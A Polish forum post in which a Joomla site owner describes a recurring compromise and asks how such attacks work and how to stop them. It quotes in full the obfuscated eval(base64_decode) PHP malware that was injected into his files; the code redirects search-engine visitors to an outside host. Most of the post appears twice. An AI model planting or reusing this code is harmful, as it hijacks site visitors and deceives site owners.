kdrogi
13-09-2013, 20:52
Moja strona w wersji joomla 1.5.26 została zaatakowana (doklejany kod do plików php) i podczas wyszukiwania w google następowało przekierowanie na inne strony.
Byłem przekonany, że przyczyną włamań jest już niewspierana i nieaktualna wersja joomli.
Z wieloma problemami i dużym nakładem pracy wykonałem migrację do joomla 2.5.14 Byłem przekonany, że moje problemy ustały.
Niestety, przekierowania pojawiły się ponownie. Ich bezpośrednim powodem był doklejany do wielu plików php np. configuration.php, index.php i innych w różnych katalogach kod
eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJH FhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsK JHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdW FnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1 YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW 5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3Ry aXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZW ZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFt YmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKS BvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJp c3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbW F0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2 dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwiZm FjZWJvb2suY29tL2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJh b2wuY29tIikpIHsKaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYW NoZSIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSBh bmQgIXN0cmlzdHIoJHJlZmVyZXIsIkVlWXAzRDciKSl7CmhlYW RlcigiTG9jYXRpb246IGh0dHA6Ly93a2RqZmdrYS5kZG5zLm1l LnVrLyIpOwpleGl0KCk7Cn0KfQp9Cn0KfQ=="));
Mam już aktualną joomlę, zainstalowany dodatek spadaj, strona logowania administratora jest niedostępna, zmieniłem wszystkie możliwe hasła, hasła wpisuję ręcznie, wiem, że obowiązują zasady bezpieczeństwa z wiki, ale nadal nie wiem w jaki konkretny sposób następują włamania i w jaki sposób im zapobiegać.
Podobne pytania i dyskusje można znaleźć na wielu stronach. Jeśli tego typu ataki są tak częste to może udało się już stwierdzić, w jaki sposób są dokonywane i w jaki sposób im zapobiec.
Pozdrawiam forumowiczów
Krzysztof
Byłem przekonany, że przyczyną włamań jest już niewspierana i nieaktualna wersja joomli.
Z wieloma problemami i dużym nakładem pracy wykonałem migrację do joomla 2.5.14 Byłem przekonany, że moje problemy ustały.
Niestety, przekierowania pojawiły się ponownie. Ich bezpośrednim powodem był doklejany do wielu plików php np. configuration.php, index.php i innych w różnych katalogach kod
eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJH FhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsK JHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdW FnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1 YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW 5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3Ry aXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZW ZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFt YmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKS BvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJp c3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbW F0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2 dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwiZm FjZWJvb2suY29tL2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJh b2wuY29tIikpIHsKaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYW NoZSIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSBh bmQgIXN0cmlzdHIoJHJlZmVyZXIsIkVlWXAzRDciKSl7CmhlYW RlcigiTG9jYXRpb246IGh0dHA6Ly93a2RqZmdrYS5kZG5zLm1l LnVrLyIpOwpleGl0KCk7Cn0KfQp9Cn0KfQ=="));
Mam już aktualną joomlę, zainstalowany dodatek spadaj, strona logowania administratora jest niedostępna, zmieniłem wszystkie możliwe hasła, hasła wpisuję ręcznie, wiem, że obowiązują zasady bezpieczeństwa z wiki, ale nadal nie wiem w jaki konkretny sposób następują włamania i w jaki sposób im zapobiegać.
Podobne pytania i dyskusje można znaleźć na wielu stronach. Jeśli tego typu ataki są tak częste to może udało się już stwierdzić, w jaki sposób są dokonywane i w jaki sposób im zapobiec.
Pozdrawiam forumowiczów
Krzysztof